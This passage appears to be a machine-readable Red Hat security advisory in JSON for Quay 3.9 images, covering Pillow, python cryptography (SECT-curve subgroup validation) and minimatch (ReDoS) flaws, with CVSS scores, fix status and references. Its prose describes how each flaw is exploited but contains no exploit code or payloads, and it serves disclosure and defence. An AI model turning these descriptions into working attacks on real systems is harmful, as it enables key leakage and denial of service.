"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:32a95ce56a8ac04a8fd37eab9ff385d4042d53e533f5bba8e5592faeb09f01fc_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:a6f6ea5303d254e481143d95ab41d05a7ce31a321ca787893eba35dbd75e6caf_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:f5d0a543470bd20a4572190e50b63e9b74e5dbba552b4fe972721518e4183beb_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:3e5ce0a56241c9804249dfb302cde02d2ffe30ba8fcd8aef8f1bce916d2324ad_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:d64bb14bf73ef1bc222525bffb67a3dfab0ba3ceef4770beb8138699609d4b41_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:dd567423c854e8732542c41bfcda71948517762f8e91e31496e7dffa67b3c8c0_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:0793761b8f52bd37b70a0920c123df7b5689050fe0d0b180a23747382136805d_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:2c4942e97dbe11310a36b234b6b79248aa901521c0cc6ede26c264852cc1c6c7_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:e16ff32fc51fc8515f0798b9b0facfae3b18e11d1c200ad561c5f96c4591e748_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1f6d8b0bf693a4ff88c2e5f8fe5a39ce306243eb60670272f31b1ce0784355d5_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:1c162f16e74dff074693cb2c1629fa10fcbdda7e297305c505c3eadbbb6fd253_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ca15dc9c0af98219cf20368b4fb1d7f5e79a72112446b3cb2bc29d0950a4a614_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ce8008cf1e109a6109802654da56c24a94b436a15d68cac2fc7154e955ea60c3_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:24860b370a6bd80d71b174736e21690cc3360b7e03eba42a7e9b6ee0f8e513f1_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:591ecd8de762d2064ff254bb0ab87c7f67fc2feda462dfc91386cec7fb58be59_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:6e208ffe402a0a2fef67414ce3c23849129054b4d58285eaecb5d7511b4a8a94_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:cb97c36edb2dbd26a82a421316b2d78694b58b446e03fc9770225a238b6ac65f_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:3443ae24c14bfe47730a8c9d80478948df7364eb5a11c031537d6a1ec39aac8d_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6a0081cc99c6fcf508090727ac8690b72d455a506866ae0279d19119098ea7da_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:85c2ef5ae8e143f76831e6231c420fa1d9fd0ea237dfd1bce7d6751b09203dd0_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:d97a9d9d6da4388e61873bf60413a321be153e2a9d19031fa885bcc69540afc6_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-bundle@sha256:7363defd98566b083b35c27715a53bc5bfbcbd73fa9dafe7a6218166e9d11b14_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:32a95ce56a8ac04a8fd37eab9ff385d4042d53e533f5bba8e5592faeb09f01fc_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:a6f6ea5303d254e481143d95ab41d05a7ce31a321ca787893eba35dbd75e6caf_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:f5d0a543470bd20a4572190e50b63e9b74e5dbba552b4fe972721518e4183beb_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:3e5ce0a56241c9804249dfb302cde02d2ffe30ba8fcd8aef8f1bce916d2324ad_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:d64bb14bf73ef1bc222525bffb67a3dfab0ba3ceef4770beb8138699609d4b41_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:dd567423c854e8732542c41bfcda71948517762f8e91e31496e7dffa67b3c8c0_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "pillow: Pillow: Out-of-bounds Write via Specially Crafted PSD Image"
},
{
"cve": "CVE-2026-26007",
"cwe": {
"id": "CWE-354",
"name": "Improper Validation of Integrity Check Value"
},
"discovery_date": "2026-02-10T22:01:01.036116+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:0793761b8f52bd37b70a0920c123df7b5689050fe0d0b180a23747382136805d_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:2c4942e97dbe11310a36b234b6b79248aa901521c0cc6ede26c264852cc1c6c7_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:e16ff32fc51fc8515f0798b9b0facfae3b18e11d1c200ad561c5f96c4591e748_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1f6d8b0bf693a4ff88c2e5f8fe5a39ce306243eb60670272f31b1ce0784355d5_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:1c162f16e74dff074693cb2c1629fa10fcbdda7e297305c505c3eadbbb6fd253_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ca15dc9c0af98219cf20368b4fb1d7f5e79a72112446b3cb2bc29d0950a4a614_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ce8008cf1e109a6109802654da56c24a94b436a15d68cac2fc7154e955ea60c3_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:24860b370a6bd80d71b174736e21690cc3360b7e03eba42a7e9b6ee0f8e513f1_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:591ecd8de762d2064ff254bb0ab87c7f67fc2feda462dfc91386cec7fb58be59_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:6e208ffe402a0a2fef67414ce3c23849129054b4d58285eaecb5d7511b4a8a94_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:cb97c36edb2dbd26a82a421316b2d78694b58b446e03fc9770225a238b6ac65f_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:3443ae24c14bfe47730a8c9d80478948df7364eb5a11c031537d6a1ec39aac8d_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6a0081cc99c6fcf508090727ac8690b72d455a506866ae0279d19119098ea7da_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:85c2ef5ae8e143f76831e6231c420fa1d9fd0ea237dfd1bce7d6751b09203dd0_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:d97a9d9d6da4388e61873bf60413a321be153e2a9d19031fa885bcc69540afc6_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-bundle@sha256:7363defd98566b083b35c27715a53bc5bfbcbd73fa9dafe7a6218166e9d11b14_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:32a95ce56a8ac04a8fd37eab9ff385d4042d53e533f5bba8e5592faeb09f01fc_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:a6f6ea5303d254e481143d95ab41d05a7ce31a321ca787893eba35dbd75e6caf_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:f5d0a543470bd20a4572190e50b63e9b74e5dbba552b4fe972721518e4183beb_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2438762"
}
],
"notes": [
{
"category": "description",
"text": "A validation flaw has been discovered in the python cryptography package. This missing validation allows an attacker to provide a public key point P from a small-order subgroup. This can lead to security issues in various situations, such as the most commonly used signature verification (ECDSA) and shared key negotiation (ECDH). When the victim computes the shared secret as S = [victim_private_key]P via ECDH, this leaks information about victim_private_key mod (small_subgroup_order). For curves with cofactor \u003e 1, this reveals the least significant bits of the private key. When these weak public keys are used in ECDSA , it\u0027s easy to forge signatures on the small subgroup. Only SECT curves are impacted by this.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "cryptography: cryptography Subgroup Attack Due to Missing Subgroup Validation for SECT Curves",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This flaw, while difficult to exploit, would lead to a loss of integrity in the encrypted communication channel. Given that the cryptography package is a library, it is likely to be used in situations that do not require user interaction.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:3e5ce0a56241c9804249dfb302cde02d2ffe30ba8fcd8aef8f1bce916d2324ad_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:d64bb14bf73ef1bc222525bffb67a3dfab0ba3ceef4770beb8138699609d4b41_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:dd567423c854e8732542c41bfcda71948517762f8e91e31496e7dffa67b3c8c0_amd64"
],
"known_not_affected": [
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:0793761b8f52bd37b70a0920c123df7b5689050fe0d0b180a23747382136805d_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:2c4942e97dbe11310a36b234b6b79248aa901521c0cc6ede26c264852cc1c6c7_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:e16ff32fc51fc8515f0798b9b0facfae3b18e11d1c200ad561c5f96c4591e748_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1f6d8b0bf693a4ff88c2e5f8fe5a39ce306243eb60670272f31b1ce0784355d5_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:1c162f16e74dff074693cb2c1629fa10fcbdda7e297305c505c3eadbbb6fd253_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ca15dc9c0af98219cf20368b4fb1d7f5e79a72112446b3cb2bc29d0950a4a614_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ce8008cf1e109a6109802654da56c24a94b436a15d68cac2fc7154e955ea60c3_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:24860b370a6bd80d71b174736e21690cc3360b7e03eba42a7e9b6ee0f8e513f1_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:591ecd8de762d2064ff254bb0ab87c7f67fc2feda462dfc91386cec7fb58be59_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:6e208ffe402a0a2fef67414ce3c23849129054b4d58285eaecb5d7511b4a8a94_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:cb97c36edb2dbd26a82a421316b2d78694b58b446e03fc9770225a238b6ac65f_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:3443ae24c14bfe47730a8c9d80478948df7364eb5a11c031537d6a1ec39aac8d_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6a0081cc99c6fcf508090727ac8690b72d455a506866ae0279d19119098ea7da_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:85c2ef5ae8e143f76831e6231c420fa1d9fd0ea237dfd1bce7d6751b09203dd0_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:d97a9d9d6da4388e61873bf60413a321be153e2a9d19031fa885bcc69540afc6_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-bundle@sha256:7363defd98566b083b35c27715a53bc5bfbcbd73fa9dafe7a6218166e9d11b14_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:32a95ce56a8ac04a8fd37eab9ff385d4042d53e533f5bba8e5592faeb09f01fc_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:a6f6ea5303d254e481143d95ab41d05a7ce31a321ca787893eba35dbd75e6caf_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:f5d0a543470bd20a4572190e50b63e9b74e5dbba552b4fe972721518e4183beb_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-26007"
},
{
"category": "external",
"summary": "RHBZ#2438762",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2438762"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-26007",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-26007"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-26007",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26007"
},
{
"category": "external",
"summary": "https://github.com/pyca/cryptography/commit/0eebb9dbb6343d9bc1d91e5a2482ed4e054a6d8c",
"url": "https://github.com/pyca/cryptography/commit/0eebb9dbb6343d9bc1d91e5a2482ed4e054a6d8c"
},
{
"category": "external",
"summary": "https://github.com/pyca/cryptography/security/advisories/GHSA-r6ph-v2qm-q3c2",
"url": "https://github.com/pyca/cryptography/security/advisories/GHSA-r6ph-v2qm-q3c2"
}
],
"release_date": "2026-02-10T21:42:56.471000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-19T19:18:06+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:3e5ce0a56241c9804249dfb302cde02d2ffe30ba8fcd8aef8f1bce916d2324ad_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:d64bb14bf73ef1bc222525bffb67a3dfab0ba3ceef4770beb8138699609d4b41_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:dd567423c854e8732542c41bfcda71948517762f8e91e31496e7dffa67b3c8c0_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5168"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:0793761b8f52bd37b70a0920c123df7b5689050fe0d0b180a23747382136805d_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:2c4942e97dbe11310a36b234b6b79248aa901521c0cc6ede26c264852cc1c6c7_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:e16ff32fc51fc8515f0798b9b0facfae3b18e11d1c200ad561c5f96c4591e748_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1f6d8b0bf693a4ff88c2e5f8fe5a39ce306243eb60670272f31b1ce0784355d5_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:1c162f16e74dff074693cb2c1629fa10fcbdda7e297305c505c3eadbbb6fd253_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ca15dc9c0af98219cf20368b4fb1d7f5e79a72112446b3cb2bc29d0950a4a614_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ce8008cf1e109a6109802654da56c24a94b436a15d68cac2fc7154e955ea60c3_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:24860b370a6bd80d71b174736e21690cc3360b7e03eba42a7e9b6ee0f8e513f1_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:591ecd8de762d2064ff254bb0ab87c7f67fc2feda462dfc91386cec7fb58be59_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:6e208ffe402a0a2fef67414ce3c23849129054b4d58285eaecb5d7511b4a8a94_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:cb97c36edb2dbd26a82a421316b2d78694b58b446e03fc9770225a238b6ac65f_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:3443ae24c14bfe47730a8c9d80478948df7364eb5a11c031537d6a1ec39aac8d_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6a0081cc99c6fcf508090727ac8690b72d455a506866ae0279d19119098ea7da_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:85c2ef5ae8e143f76831e6231c420fa1d9fd0ea237dfd1bce7d6751b09203dd0_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:d97a9d9d6da4388e61873bf60413a321be153e2a9d19031fa885bcc69540afc6_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-bundle@sha256:7363defd98566b083b35c27715a53bc5bfbcbd73fa9dafe7a6218166e9d11b14_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:32a95ce56a8ac04a8fd37eab9ff385d4042d53e533f5bba8e5592faeb09f01fc_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:a6f6ea5303d254e481143d95ab41d05a7ce31a321ca787893eba35dbd75e6caf_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:f5d0a543470bd20a4572190e50b63e9b74e5dbba552b4fe972721518e4183beb_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:3e5ce0a56241c9804249dfb302cde02d2ffe30ba8fcd8aef8f1bce916d2324ad_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:d64bb14bf73ef1bc222525bffb67a3dfab0ba3ceef4770beb8138699609d4b41_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:dd567423c854e8732542c41bfcda71948517762f8e91e31496e7dffa67b3c8c0_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:0793761b8f52bd37b70a0920c123df7b5689050fe0d0b180a23747382136805d_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:2c4942e97dbe11310a36b234b6b79248aa901521c0cc6ede26c264852cc1c6c7_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:e16ff32fc51fc8515f0798b9b0facfae3b18e11d1c200ad561c5f96c4591e748_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1f6d8b0bf693a4ff88c2e5f8fe5a39ce306243eb60670272f31b1ce0784355d5_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:1c162f16e74dff074693cb2c1629fa10fcbdda7e297305c505c3eadbbb6fd253_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ca15dc9c0af98219cf20368b4fb1d7f5e79a72112446b3cb2bc29d0950a4a614_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ce8008cf1e109a6109802654da56c24a94b436a15d68cac2fc7154e955ea60c3_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:24860b370a6bd80d71b174736e21690cc3360b7e03eba42a7e9b6ee0f8e513f1_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:591ecd8de762d2064ff254bb0ab87c7f67fc2feda462dfc91386cec7fb58be59_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:6e208ffe402a0a2fef67414ce3c23849129054b4d58285eaecb5d7511b4a8a94_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:cb97c36edb2dbd26a82a421316b2d78694b58b446e03fc9770225a238b6ac65f_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:3443ae24c14bfe47730a8c9d80478948df7364eb5a11c031537d6a1ec39aac8d_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6a0081cc99c6fcf508090727ac8690b72d455a506866ae0279d19119098ea7da_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:85c2ef5ae8e143f76831e6231c420fa1d9fd0ea237dfd1bce7d6751b09203dd0_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:d97a9d9d6da4388e61873bf60413a321be153e2a9d19031fa885bcc69540afc6_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-bundle@sha256:7363defd98566b083b35c27715a53bc5bfbcbd73fa9dafe7a6218166e9d11b14_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:32a95ce56a8ac04a8fd37eab9ff385d4042d53e533f5bba8e5592faeb09f01fc_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:a6f6ea5303d254e481143d95ab41d05a7ce31a321ca787893eba35dbd75e6caf_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:f5d0a543470bd20a4572190e50b63e9b74e5dbba552b4fe972721518e4183beb_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:3e5ce0a56241c9804249dfb302cde02d2ffe30ba8fcd8aef8f1bce916d2324ad_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:d64bb14bf73ef1bc222525bffb67a3dfab0ba3ceef4770beb8138699609d4b41_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-rhel8@sha256:dd567423c854e8732542c41bfcda71948517762f8e91e31496e7dffa67b3c8c0_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "cryptography: cryptography Subgroup Attack Due to Missing Subgroup Validation for SECT Curves"
},
{
"cve": "CVE-2026-26996",
"cwe": {
"id": "CWE-1333",
"name": "Inefficient Regular Expression Complexity"
},
"discovery_date": "2026-02-20T04:01:11.896063+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:0793761b8f52bd37b70a0920c123df7b5689050fe0d0b180a23747382136805d_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:2c4942e97dbe11310a36b234b6b79248aa901521c0cc6ede26c264852cc1c6c7_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/clair-rhel8@sha256:e16ff32fc51fc8515f0798b9b0facfae3b18e11d1c200ad561c5f96c4591e748_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:1f6d8b0bf693a4ff88c2e5f8fe5a39ce306243eb60670272f31b1ce0784355d5_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:1c162f16e74dff074693cb2c1629fa10fcbdda7e297305c505c3eadbbb6fd253_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ca15dc9c0af98219cf20368b4fb1d7f5e79a72112446b3cb2bc29d0950a4a614_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ce8008cf1e109a6109802654da56c24a94b436a15d68cac2fc7154e955ea60c3_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:24860b370a6bd80d71b174736e21690cc3360b7e03eba42a7e9b6ee0f8e513f1_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:591ecd8de762d2064ff254bb0ab87c7f67fc2feda462dfc91386cec7fb58be59_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:6e208ffe402a0a2fef67414ce3c23849129054b4d58285eaecb5d7511b4a8a94_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-builder-rhel8@sha256:cb97c36edb2dbd26a82a421316b2d78694b58b446e03fc9770225a238b6ac65f_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:3443ae24c14bfe47730a8c9d80478948df7364eb5a11c031537d6a1ec39aac8d_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6a0081cc99c6fcf508090727ac8690b72d455a506866ae0279d19119098ea7da_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:85c2ef5ae8e143f76831e6231c420fa1d9fd0ea237dfd1bce7d6751b09203dd0_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:d97a9d9d6da4388e61873bf60413a321be153e2a9d19031fa885bcc69540afc6_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-bundle@sha256:7363defd98566b083b35c27715a53bc5bfbcbd73fa9dafe7a6218166e9d11b14_amd64",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:32a95ce56a8ac04a8fd37eab9ff385d4042d53e533f5bba8e5592faeb09f01fc_ppc64le",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:a6f6ea5303d254e481143d95ab41d05a7ce31a321ca787893eba35dbd75e6caf_s390x",
"Red Hat Quay 3.9:registry.redhat.io/quay/quay-operator-rhel8@sha256:f5d0a543470bd20a4572190e50b63e9b74e5dbba552b4fe972721518e4183beb_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2441268"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in minimatch. A remote attacker could exploit this Regular Expression Denial of Service (ReDoS) vulnerability by providing a specially crafted glob pattern. This pattern, containing numerous consecutive wildcard characters, causes excessive processing and exponential backtracking in the regular expression engine. Successful exploitation leads to a Denial of Service (DoS), making the application unresponsive.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "minimatch: minimatch: Denial of Service via specially crafted glob patterns",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Exploitation of this flaw requires that a user or service processes untrusted input.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
